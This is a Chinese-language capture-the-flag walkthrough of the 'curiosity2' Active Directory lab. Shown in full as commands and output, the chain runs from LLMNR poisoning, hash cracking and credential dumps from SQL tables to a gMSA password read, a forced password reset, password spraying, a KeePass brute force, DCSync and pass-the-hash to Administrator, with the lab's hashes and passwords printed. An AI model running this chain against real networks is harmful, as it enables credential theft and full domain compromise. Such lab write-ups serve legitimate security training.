6.curiosity2
1. 基本信息^toc
- 1. 基本信息
- 2. 信息收集
- 3. sqlcmd操作
- 4. bloodhound分析域内环境
- 5. 数据库获取信息
- 6. 密码喷涂
- 7. 破解kdbx数据库文件
- [[#8. DCSync|8. DCSync]]
靶机链接
难度 ⭐️⭐️⭐️⭐️⭐️
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# fscan -h 192.168.56.116
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _`' |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
192.168.56.116:135 open
192.168.56.116:139 open
192.168.56.116:445 open
192.168.56.116:88 open
[*] alive ports len is: 4
start vulscan
[*] NetBios 192.168.56.116 [+] DC:CONS\WIN-C73PROQLRHL
[*] NetInfo
[*]192.168.56.116
[->]WIN-C73PROQLRHL
[->]192.168.56.116
[->]10.16.41.51
[->]2409:8760:1e81:10::39d9
已完成 4/4
[*] 扫描结束,耗时: 2.092922428s
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# nmap -sCV 192.168.56.116
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 17:57 CST
Nmap scan report for 192.168.56.116
Host is up (0.00029s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-10 16:57:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
|_ssl-date: 2024-12-10T16:58:30+00:00; +6h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-10T16:58:30+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-10T16:58:30+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
MAC Address: 08:00:27:C1:EE:2F (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-C73PROQLRHL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: WIN-C73PROQLRHL, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:c1:ee:2f (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2024-12-10T16:58:21
|_ start_date: 2024-12-10T16:56:53
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.57 seconds
2.2. ntlm中毒攻击
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# responder -I eth0
[SMB] NTLMv2-SSP Client : fe80::e880:b43a:2756:c900
[SMB] NTLMv2-SSP Username : cons\Appolonia
[SMB] NTLMv2-SSP Hash : Appolonia::cons:49ad08d5b95f487e:7981C671B6509FFED9036CB51727F74D:010100000000000080A60B552D4BDB01CEC743A0ED3C72F20000000002000800380035005200410001001E00570049004E002D0054004B005A00410054004A0045004C0049003200440004003400570049004E002D0054004B005A00410054004A0045004C004900320044002E0038003500520041002E004C004F00430041004C000300140038003500520041002E004C004F00430041004C000500140038003500520041002E004C004F00430041004C000700080080A60B552D4BDB0106000400020000000800300030000000000000000000000000400000F8AC0EC0C53E58EC88B9F6134D5F79AEA985E41E98EE06169DEB1E85F052D0610A0010000000000000000000000000000000000009001C0063006900660073002F00530051004C00730065007200760065007200000000000000000000000000
[*] [NBT-NS] Poisoned answer sent to 192.168.56.116 for name SQLDATABABASE (service: File Server)
[*] [LLMNR] Poisoned answer sent to fe80::e880:b43a:2756:c900 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to 192.168.56.116 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to fe80::e880:b43a:2756:c900 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to 192.168.56.116 for name SQLDatababase
[SMB] NTLMv2-SSP Client : fe80::e880:b43a:2756:c900
[SMB] NTLMv2-SSP Username : cons\sqldb
[SMB] NTLMv2-SSP Hash : sqldb::cons:d7ed9707c16853ff:95D5F1D9D93D1C77A5C6B4E03B2BACDC:010100000000000080A60B552D4BDB017F14781EF42811660000000002000800380035005200410001001E00570049004E002D0054004B005A00410054004A0045004C0049003200440004003400570049004E002D0054004B005A00410054004A0045004C004900320044002E0038003500520041002E004C004F00430041004C000300140038003500520041002E004C004F00430041004C000500140038003500520041002E004C004F00430041004C000700080080A60B552D4BDB0106000400020000000800300030000000000000000000000000400000F8AC0EC0C53E58EC88B9F6134D5F79AEA985E41E98EE06169DEB1E85F052D0610A001000000000000000000000000000000000000900240063006900660073002F00530051004C004400610074006100620061006200610073006500000000000000000000000000
2.3. 爆破Hash
根据这个作者的习惯。rockyou一般都是爆破不出来的
换一个字典爆破
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# hashcat -a 0 -m 5600 appolonia_ntlmv2.txt /usr/share/wordlists/seclists/Passwords/seasons.txt
APPOLONIA::cons:49ad08d5b95f487e:7981c671b6509ffed9036cb51727f74d:010100000000000080a60b552d4bdb01cec743a0ed3c72f20000000002000800380035005200410001001e00570049004e002d0054004b005a00410054004a0045004c0049003200440004003400570049004e002d0054004b005a00410054004a0045004c004900320044002e0038003500520041002e004c004f00430041004c000300140038003500520041002e004c004f00430041004c000500140038003500520041002e004c004f00430041004c000700080080a60b552d4bdb0106000400020000000800300030000000000000000000000000400000f8ac0ec0c53e58ec88b9f6134d5f79aea985e41e98ee06169deb1e85f052d0610a0010000000000000000000000000000000000009001c0063006900660073002f00530051004c00730065007200760065007200000000000000000000000000:5umm3r@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: APPOLONIA::cons:49ad08d5b95f487e:7981c671b6509ffed9...000000
Time.Started.....: Mon Dec 16 16:25:24 2024 (0 secs)
Time.Estimated...: Mon Dec 16 16:25:24 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/seclists/Passwords/seasons.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1764.7 kH/s (1.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4096/5390 (75.99%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/5390 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $pr1ng -> W1NT3R2021@
Hardware.Mon.#1..: Util: 12%
Started: Mon Dec 16 16:25:23 2024
Stopped: Mon Dec 16 16:25:25 2024
SQLDB::cons:d7ed9707c16853ff:95d5f1d9d93d1c77a5c6b4e03b2bacdc:010100000000000080a60b552d4bdb017f14781ef42811660000000002000800380035005200410001001e00570049004e002d0054004b005a00410054004a0045004c0049003200440004003400570049004e002d0054004b005a00410054004a0045004c004900320044002e0038003500520041002e004c004f00430041004c000300140038003500520041002e004c004f00430041004c000500140038003500520041002e004c004f00430041004c000700080080a60b552d4bdb0106000400020000000800300030000000000000000000000000400000f8ac0ec0c53e58ec88b9f6134d5f79aea985e41e98ee06169deb1e85f052d0610a001000000000000000000000000000000000000900240063006900660073002f00530051004c004400610074006100620061006200610073006500000000000000000000000000:au7umn@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQLDB::cons:d7ed9707c16853ff:95d5f1d9d93d1c77a5c6b4...000000
Time.Started.....: Mon Dec 16 16:26:39 2024 (0 secs)
Time.Estimated...: Mon Dec 16 16:26:39 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/seclists/Passwords/seasons.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1785.6 kH/s (1.52ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4096/5390 (75.99%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/5390 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $pr1ng -> W1NT3R2021@
Hardware.Mon.#1..: Util: 12%
Started: Mon Dec 16 16:26:39 2024
Stopped: Mon Dec 16 16:26:41 2024
成功获取到了两个账号密码
SQLDB : au7umn@
APPOLONIA : 5umm3r@
测试后两个都可以登录上去
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# evil-winrm -i 192.168.56.116 -u APPOLONIA -p '5umm3r@'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\appolonia\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# evil-winrm -i 192.168.56.116 -u SQLDB -p 'au7umn@'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sqldb\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
3. sqlcmd操作
获取数据库信息
*Evil-WinRM* PS C:\Users\sqldb\Documents> reg query "HKLM\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\SQL"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\SQL
SQLEXPRESS REG_SZ MSSQL15.SQLEXPRESS
数据库名字是 SQLEXPRESS 但完整的名字是 WIN-C73PROQLRHL\SQLEXPRESS
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -E -S 'WIN-C73PROQLRHL\SQLEXPRESS' -Q 'select @@version;'
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2016 Datacenter 10.0 <X64> (Build 14393: ) (Hypervisor)
(1 rows affected)\
查询数据库名称
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -E -S 'WIN-C73PROQLRHL\SQLEXPRESS' -Q 'SELECT name FROM master.dbo.sysdatabases;'
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
CredentialsDB
toolsdb
(6 rows affected)
里面有一个 CredentialsDB 数据库 里面可能有我们可以利用的 查看一下
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -E -S 'WIN-C73PROQLRHL\SQLEXPRESS' -d CredentialsDB -Q "SELECT * FROM dbo.Credentials;"
ID Username Password
----------- -------------------------------------------------- ----------------------------------------------------------------------------------------------------
1 sqlsvc a6d888301de7aa3b380a691d32837627
(1 rows affected)
破解一下这个md5
a6d888301de7aa3b380a691d32837627:$PRING2021#
获取到 sqlsvc 用户的密码 $PRING2021#
收集一下域内信息
4. bloodhound分析域内环境
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# netexec ldap 192.168.56.116 -u 'SQLDB' -p 'au7umn@' --bloodhound --collection All --dns-server 192.168.56.116
SMB 192.168.56.116 445 WIN-C73PROQLRHL [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
LDAP 192.168.56.116 389 WIN-C73PROQLRHL [+] cons.thl\SQLDB:au7umn@
LDAP 192.168.56.116 389 WIN-C73PROQLRHL Resolved collection methods: acl, group, localadmin, psremote, trusts, objectprops, session, rdp, dcom, container
LDAP 192.168.56.116 389 WIN-C73PROQLRHL Done in 00M 00S
LDAP 192.168.56.116 389 WIN-C73PROQLRHL Compressing output into /root/.nxc/logs/WIN-C73PROQLRHL_192.168.56.116_2024-12-16_165009_bloodhound.zip
使用 netexec 收集失败。可能是那里出了问题
直接传SharpHound.exe 上去收集
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> upload /home/kali/thl/curiosity2/SharpHound.exe
Info: Uploading /home/kali/thl/curiosity2/SharpHound.exe to C:\Users\sqlsvc\Documents\SharpHound.exe
Data: 1395368 bytes of 1395368 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> ls
Directory: C:\Users\sqlsvc\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/31/2024 6:23 PM 2231 Database.kdbx
-a---- 12/16/2024 4:55 PM 1046528 SharpHound.exe
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> ./SharpHound.exe
2024-12-16T16:55:38.5773646+01:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-12-16T16:55:39.0929517+01:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-12-16T16:55:39.4209905+01:00|INFORMATION|Initializing SharpHound at 16:55 on 16/12/2024
2024-12-16T16:55:42.0303498+01:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for cons.thl : WIN-C73PROQLRHL.cons.thl
2024-12-16T16:55:42.1237157+01:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-12-16T16:55:42.5300046+01:00|INFORMATION|Beginning LDAP search for cons.thl
2024-12-16T16:55:42.6708951+01:00|INFORMATION|Producer has finished, closing LDAP channel
2024-12-16T16:55:42.6868321+01:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-12-16T16:56:12.8426741+01:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-12-16T16:56:29.4678294+01:00|INFORMATION|Consumers finished, closing output channel
2024-12-16T16:56:29.5152889+01:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-12-16T16:56:29.8740248+01:00|INFORMATION|Status: 192 objects finished (+192 4.085106)/s -- Using 42 MB RAM
2024-12-16T16:56:29.8740248+01:00|INFORMATION|Enumeration finished in 00:00:47.3672286
2024-12-16T16:56:30.0931388+01:00|INFORMATION|Saving cache with stats: 152 ID to type mappings.
152 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-12-16T16:56:30.1869703+01:00|INFORMATION|SharpHound Enumeration Completed at 16:56 on 16/12/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> ls
Directory: C:\Users\sqlsvc\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/16/2024 4:56 PM 16777 20241216165628_BloodHound.zip
-a---- 10/31/2024 6:23 PM 2231 Database.kdbx
-a---- 12/16/2024 4:56 PM 22359 NzAyMzNmYzYtYzFjNi00MDYxLTg5ZTYtY2FmOWMwODg1MzZm.bin
-a---- 12/16/2024 4:55 PM 1046528 SharpHound.exe
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> download 20241216165628_BloodHound.zip
Info: Downloading C:\Users\sqlsvc\Documents\20241216165628_BloodHound.zip to 20241216165628_BloodHound.zip
Info: Download successful!
在收集时发现当前文件夹下面有一个
Database.kdbx我们将其下载下来
.kdbx是 KeePass 密码管理器使用的一种加密数据库文件格式。是 KeePass 2.x 及更高版本使用的数据库文件格式
我们当前用户 SQLSVC 是属于 SVCACCOUNTS 组
而且该组可以读取 GMSA_SQL$ 机器用户的密码
获取密码
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# nxc ldap 192.168.56.116 -u 'sqlsvc' -p '$PRING2021#' --gmsa
SMB 192.168.56.116 445 WIN-C73PROQLRHL [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
LDAPS 192.168.56.116 636 WIN-C73PROQLRHL [+] cons.thl\sqlsvc:$PRING2021#
LDAPS 192.168.56.116 636 WIN-C73PROQLRHL [*] Getting GMSA Passwords
LDAPS 192.168.56.116 636 WIN-C73PROQLRHL Account: GMSA_SQL$ NTLM: 1ac0f76a248b111e724b9ca39da34988
分析该机器用户的权限可以发现可以修改另一个用户的密码
修改密码
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# impacket-changepasswd CONS.THL/toolsdb@cons.thl -newpass 'admin!@#45' -altuser "GMSA_SQL$" -althash ':1ac0f76a248b111e724b9ca39da34988' -no-pass -reset
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Setting the password of CONS.THL\toolsdb as CONS.THL\GMSA_SQL$
[*] Connecting to DCE/RPC as CONS.THL\GMSA_SQL$
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
根据这个名字
5. 数据库获取信息
登录 toolsdb 用户 ,根据这个用户名就能猜测出多半这个用户数据库里面是有东西的,而且载上面数据库查询时时发现有一个 toolsdb 数据库 但是我们当时用户没有权限查询
利用这个用户查看 toolsdb 数据库的内容
查看数据库表名
*Evil-WinRM* PS C:\Users\toolsdb\Documents> sqlcmd -E -S "localhost\SQLEXPRESS" -d "toolsdb" -Q "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';"
TABLE_NAME
--------------------------------------------------------------------------------------------------------------------------------
users
(1 rows affected)
查看users表的内容
*Evil-WinRM* PS C:\Users\toolsdb\Documents> sqlcmd -E -S 'WIN-C73PROQLRHL\SQLEXPRESS' -d toolsdb -Q "SELECT * FROM users;"
id username password
----------- -------------------------------------------------- --------------------------------------------------
1 user_6B482050 433129A1!@1
2 user_47F7501A 64409A1C!@1
3 user_515A0C58 CAD616E3!@1
4 user_CA843BF2 731C60AD!@1
5 user_AA2B9FF8 8E181E5F!@1
6 user_F6E6A108 47862562!@1
7 user_8D56BAE8 425B6335!@1
8 user_BA9B1295 E4FC1AC4!@1
9 user_66B7DBEE 4EE216A3!@1
10 user_E75B7C23 4CD89A92!@1
(10 rows affected)
6. 密码喷涂
将这些密码存在一个文件里面作为字典
然后使用rpcclient获取域内所有的用户
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# rpcclient -U "Appolonia%5umm3r@" 192.168.56.116 -c 'enumdomusers'|cut -d '[' -f2|cut -d ']' -f1 >dbuser.txt
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# crackmapexec smb cons.thl -u dbuser.txt -p userdb_pass --continue-on-success
SMB cons.thl 445 WIN-C73PROQLRHL [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:433129A1!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:64409A1C!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:CAD616E3!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:731C60AD!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:8E181E5F!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:47862562!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:425B6335!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:E4FC1AC4!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:4EE216A3!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:4CD89A92!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Guest:433129A1!@1 STATUS_LOGON_FAILURE
...
全部失败了
可能这个密码不是这些用户的
7. 破解kdbx数据库文件
有可能是我们之前获取的kdbx文件数据库的密码
利用工具进行爆破
https://github.com/r3nt0n/keepass4brute
需要先安装前置环境
add-apt-repository -y ppa:phoerious/keepassxc
apt update && sudo apt install keepassxc
爆破密码
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# ./keepass4brute.sh Database.kdbx userdb_pass
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 5/9 - Attempts per minute: 0 - Estimated time remaining: Calculating...
[+] Current attempt: 8E181E5F!@1
[*] Password found: 8E181E5F!@1
成功获取到数据库的密码 8E181E5F!@1
查看数据库文件内容
可以发现有 MSOL 用户的密码 YRax2Ry8g2ITQ3hpRPze
8. DCSync
分析 MSOL 用户,发现可以执行DCSync攻击
┌──(root㉿kali)-[/home/…/thl/curiosity2/impacket-master/impacket]
└─# impacket-secretsdump MSOL:'YRax2Ry8g2ITQ3hpRPze'@WIN-C73PROQLRHL.cons.thl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5d48bcf84aea999fb1ade06970a81237:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a6c4014f622dcadd4ec24cec540aaa86:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cons.thl\sqlsvc:1104:aad3b435b51404eeaad3b435b51404ee:17e75629f370f459434786808006cac1:::
cons.thl\jwats:1105:aad3b435b51404eeaad3b435b51404ee:197c3e98518a436666dbe95d78dc87a6:::
...
pth上去获取flag
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# evil-winrm -i 192.168.56.116 -u Administrator -H '5d48bcf84aea999fb1ade06970a81237'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cons\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type root.flag.txt
372a1c39714b6bbcec0f85de5c6c2599
*Evil-WinRM* PS C:\Users\appolonia\documents> type user.flag.txt
de4769769d10f96ae069e9926a10454e